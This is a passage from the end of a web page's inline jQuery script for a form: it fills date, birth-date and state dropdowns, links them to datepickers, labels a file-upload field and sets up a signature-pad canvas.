                minDoB=maxDoB-120;

            $.fn.populateSelect = function(which, range) {
                switch(which){
                    case "day":
                        for(var i=lenDay; i>=1; i--) $(this).append('<option value="'+ i +'">' + i + '</option>');
                    break;
                    case "month":
                        for(var i=lenMonth; i>=1; i--) $(this).append('<option value="'+ i +'">' + monthList[i] + '</option>');
                    break;
                    case "year":
                        if(typeof range === "undefined") break;
                        for(var i=range.max; i>=range.min; i--) $(this).append('<option value="'+ i +'">' + i + '</option>');
                    break;
                    case "state":
                        for(var i=0; i<stateList.length; i++) $(this).append('<option value="'+ stateList[i]['code'] +'">' + stateList[i]['name'] + '</option>');
                    break;
                    default:break;
                }
            }
            $("#data-datePicker").val(new Date(Date.now()).toLocaleString());
            $("#data-dateDay, #data-dobDay").populateSelect("day");
            $("#data-dateMonth, #data-dobMonth").populateSelect("month");
            $("#data-dateYear").populateSelect("year", {max:maxDate, min:minDate});
            $("#data-dobYear").populateSelect("year", {max:maxDoB, min:minDoB});
            $("#data-state").populateSelect("state");

            $('#data-datePicker').datepicker({
                dateFormat:'dd/mm/yy',
                maxDate:'31/12/' + maxDate,
                minDate:'01/01/' + minDate,
                showOn:'button',
                buttonImageOnly:true,
                buttonImage:'https://i.imgur.com/qkTTWvf.png',
                buttonText:'View calendar',
                onSelect:updateDate
            });
            $('#data-dobPicker').datepicker({
                dateFormat:'dd/mm/yy',
                maxDate:'31/12/' + maxDoB,
                minDate:'01/01/' + minDoB,
                showOn:'button',
                buttonImageOnly:true,
                buttonImage:'https://i.imgur.com/qkTTWvf.png',
                buttonText:'View calendar',
                onSelect:updateDoB
            });
            function updateDate(dateStr) {
                var date = $('#data-datePicker').datepicker('getDate');
                $('#data-dateDay').val(date ? date.getDate() : '');
                $('#data-dateMonth').val(date ? date.getMonth() + 1 : '');
                $('#data-dateYear').val(date ? date.getFullYear() : '');
            }
            function updateDoB(dateStr) {
                var date = $('#data-dobPicker').datepicker('getDate');
                $('#data-dobDay').val(date ? date.getDate() : '');
                $('#data-dobMonth').val(date ? date.getMonth() + 1 : '');
                $('#data-dobYear').val(date ? date.getFullYear() : '');
            }
            $('#data-dateDay, #data-dateMonth, #data-dateYear').change(function(){
                $('#data-datePicker').datepicker('setDate', new Date($('#data-dateYear').val(), $('#data-dateMonth').val() - 1, $('#data-dateDay').val()));
            });
            $('#data-dobDay, #data-dobMonth, #data-dobYear').change(function(){
                $('#data-dobPicker').datepicker('setDate', new Date($('#data-dobYear').val(), $('#data-dobMonth').val() - 1, $('#data-dobDay').val()));
            });
            updateDate();
            updateDoB();

            /******************** 
            * CUSTOM FILE INPUT *
            ********************/
            $(".custom-file-input").on("change", function(){
                var fileName = $(this).val().split("\\").pop();
                $(this).siblings(".custom-file-label").addClass("selected").html(fileName);
            });

            /************ 
            * SIGNATURE *
            ************/
            var canvas = document.getElementById('signature-pad');
            // Adjust canvas coordinate space taking into account pixel ratio,
            // to make it look crisp on mobile devices.
            // This also causes canvas to be cleared.
            function resizeCanvas(){
                // When zoomed out to less than 100%, for some very strange reason,
                // some browsers report devicePixelRatio as less than 1
                // and only part of the canvas is cleared then.
                var ratio =  Math.max(window.devicePixelRatio || 1, 1);
                canvas.width = canvas.offsetWidth * ratio;
                canvas.height = canvas.offsetHeight * ratio;
                canvas.getContext("2d").scale(ratio, ratio);
            }

            window.onresize = resizeCanvas;
            resizeCanvas();

            var signaturePad = new SignaturePad(canvas, {
                backgroundColor:'rgb(255, 255, 255)' // necessary for saving image as JPEG; can be removed is only saving as PNG or SVG
            });

            $("#signature-clear").on('click', function(){
                signaturePad.clear();
            });
        </script>
    </body>
</html>